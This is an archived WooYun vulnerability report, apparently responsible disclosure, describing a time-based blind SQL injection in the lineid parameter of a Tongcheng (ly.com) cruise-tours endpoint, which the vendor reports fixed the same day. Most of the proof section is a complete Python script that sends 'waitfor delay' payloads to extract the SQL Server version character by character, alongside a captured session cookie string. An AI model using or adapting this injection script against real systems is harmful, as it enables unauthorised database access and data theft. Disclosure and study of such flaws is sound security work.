当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095176

漏洞标题:同程网主站存在某处SQL盲注漏洞(附验证脚本)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: xxyyzz

提交时间:2015-02-02 12:04

修复时间:2015-02-02 15:26

公开时间:2015-02-02 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-02: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

同程主站sql盲注

详细说明:

http://www.ly.com/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&iid=0.7168335842458044&lineid=70855的lineid参数存在SQL盲注

QQ截图20150130193044.png

QQ截图20150130193125.png

漏洞证明:

QQ截图20150202114134.png


不稳定的时候需要调整时间参数

#-*-coding:utf-8-*-
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Cookie': 'Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; BIGipServerdj-ly-com-pool=3422687404.20480.0000; ASP.NET_SessionId=3pahjdtqnqdjxj3rmrvr25y4; route=e7880858d53355284a6c3af0a94e1de3; BIGipServertengine-api-pool=3775271084.20480.0000; Hm_lpvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581784; BIGipServerly-zhuanti=469962924.8963.0000; BIGipServerly-huochepiao=2986479788.8707.0000; BIGipServerly-huochepiao-resource=3489861804.8451.0000; BIGipServerly-huochepiao-search=2197950636.8451.0000; BIGipServerly-news-lvs=1376129196.20480.0000; BIGipServerly-lvs=1376129196.20480.0000; BIGipServerly-youlun=4194439340.8963.0000; 17uCNRefId=-1; TicketSEInfo=RefId=0&SEFrom=&SEKeyWords=; CNSEInfo=RefId=0&SEFrom=&SEKeyWords=&RefUrl=; __tctmc=144323752.95750554; __tctmd=144323752.88932893; __tctmu=144323752.0.0; __tctmz=144323752.1422589270801.7.6.utmccn=(referral)|utmcsr=http:|utmcct=show/5|utmcmd=referral; longKey=1422588589273300; KOInfo=KOId=0; COMSEInfo=RefId=1308721&SEFrom=&SEKeyWords=&RefUrl=; passport_login_state=pageurl=http%3a%2f%2fgo.ly.com%2fyouji%2f1774354.html; Hm_lpvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422589021; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; __tctmb=144323752.2935134128776432.1422589508896.1422589539854.20; whichIndex=13; twoIndex=5; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516; Hm_lpvt_0f71f0877229e4e6503de92a28cbf166=1422589546',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive SQL Server Version:'
user = ''
for i in range(1,30,1):
    for payload in payloads:
        timeout_count = 0
        try:
            conn = httplib.HTTPConnection('www.ly.com', timeout=4) 
            random.seed()
            #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- "  % (i, ord(payload))
            #print i
            #print ord(payload)
            #headers['Cookie'] = "area=" + urllib.quote(area)
            url="/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&lineid=70855"+"'if%28ascii%28substring%28%40%40version%2c"+str(i)+"%2c1%29%29="+str(ord(payload))+"%29waitfor%20delay'0%3a0%3a5'--"
            #print url
            #time.sleep(0.1)
            start_time = time.time()
            conn.request(method='GET',
                         url=url,
                         headers = headers)
            conn.getresponse()
            conn.close()
            print '.',
            
        except Exception as e:
            #print e
            timeout_count += 1
        if(timeout_count==1):    
            user += payload
            print '[In Progress]', user 
            break
print '\n[Done], SQL Server version is', user

修复方案:

过滤参数

版权声明:转载请注明来源 xxyyzz@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-02 13:51

厂商回复:

感谢关注同程旅游,已安排修复。

最新状态:

2015-02-02:已修复,稍后会联系送出200元京东礼品卡,感谢白帽子。